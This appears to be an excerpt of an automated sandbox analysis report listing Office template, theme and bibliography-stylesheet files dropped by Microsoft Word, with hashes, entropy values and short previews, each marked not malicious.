                                    SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                    SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):252
                                    Entropy (8bit):3.4680595384446202
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                    MD5:D79B5DE6D93AC06005761D88783B3EE6
                                    SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                    SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                    SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                    Malicious:false
                                    Preview:[File] OriginalName: architecture.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):5783
                                    Entropy (8bit):7.88616857639663
                                    Encrypted:false
                                    SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                    MD5:8109B3C170E6C2C114164B8947F88AA1
                                    SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                    SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                    SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):16806
                                    Entropy (8bit):7.9519793977093505
                                    Encrypted:false
                                    SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                    MD5:950F3AB11CB67CC651082FEBE523AF63
                                    SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                    SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                    SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):254
                                    Entropy (8bit):3.4720677950594836
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                    MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                    SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                    SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                    SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                    Malicious:false
                                    Preview:[File] OriginalName: CircleProcess.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):264
                                    Entropy (8bit):3.4866056878458096
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                    MD5:6C489D45F3B56845E68BE07EA804C698
                                    SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                    SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                    SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):6448
                                    Entropy (8bit):7.897260397307811
                                    Encrypted:false
                                    SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                    MD5:42A840DC06727E42D42C352703EC72AA
                                    SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                    SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                    SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):262
                                    Entropy (8bit):3.4901887319218092
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                    MD5:52BD0762F3DC77334807DDFC60D5F304
                                    SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                    SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                    SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):5596
                                    Entropy (8bit):7.875182123405584
                                    Encrypted:false
                                    SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                    MD5:CDC1493350011DB9892100E94D5592FE
                                    SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                    SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                    SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):252
                                    Entropy (8bit):3.48087342759872
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                    MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                    SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                    SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                    SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):4326
                                    Entropy (8bit):7.821066198539098
                                    Encrypted:false
                                    SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                    MD5:D32E93F7782B21785424AE2BEA62B387
                                    SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                    SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                    SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):374
                                    Entropy (8bit):3.5414485333689694
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                    MD5:2F7A8FE4E5046175500AFFA228F99576
                                    SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                    SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                    SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):47296
                                    Entropy (8bit):6.42327948041841
                                    Encrypted:false
                                    SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                    MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                    SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                    SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                    SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):290
                                    Entropy (8bit):3.5081874837369886
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                    MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                    SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                    SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                    SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):255948
                                    Entropy (8bit):5.103631650117028
                                    Encrypted:false
                                    SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                    MD5:9888A214D362470A6189DEFF775BE139
                                    SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                    SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                    SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):302
                                    Entropy (8bit):3.537169234443227
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                    MD5:9C00979164E78E3B890E56BE2DF00666
                                    SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                    SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                    SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):217137
                                    Entropy (8bit):5.068335381017074
                                    Encrypted:false
                                    SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                    MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                    SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                    SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                    SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):523048
                                    Entropy (8bit):7.715248170753013
                                    Encrypted:false
                                    SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                    MD5:C276F590BB846309A5E30ADC35C502AD
                                    SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                    SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                    SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):276
                                    Entropy (8bit):3.5159096381406645
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                    MD5:71CCB69AF8DD9821F463270FB8CBB285
                                    SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                    SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                    SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):486596
                                    Entropy (8bit):7.668294441507828
                                    Encrypted:false
                                    SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                    MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                    SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                    SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                    SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):274
                                    Entropy (8bit):3.535303979138867
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                    MD5:35AFE8D8724F3E19EB08274906926A0B
                                    SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                    SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                    SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):570901
                                    Entropy (8bit):7.674434888248144
                                    Encrypted:false
                                    SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                    MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                    SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                    SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                    SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):282
                                    Entropy (8bit):3.5459495297497368
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                    MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                    SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                    SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                    SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):558035
                                    Entropy (8bit):7.696653383430889
                                    Encrypted:false
                                    SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                    MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                    SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                    SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                    SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):276
                                    Entropy (8bit):3.5361139545278144
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                    MD5:133D126F0DE2CC4B29ECE38194983265
                                    SHA1:D8D701298D7949BE6235493925026ED405290D43
                                    SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                    SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                    Malicious:false
                                    Preview:[File] | OriginalName: Basis.thmx | Component: PPTFiles | ReqVer: 14 | Executable: {PP} | StoreLocation: {My Templates} | Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):777647
                                    Entropy (8bit):7.689662652914981
                                    Encrypted:false
                                    SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                    MD5:B30D2EF0FC261AECE90B62E9C5597379
                                    SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                    SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                    SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):290
                                    Entropy (8bit):3.5091498509646044
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                    MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                    SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                    SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                    SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                    Malicious:false
                                    Preview:[File] | OriginalName: Metropolitan.thmx | Component: PPTFiles | ReqVer: 14 | Executable: {PP} | StoreLocation: {My Templates} | Command: {FilePath}
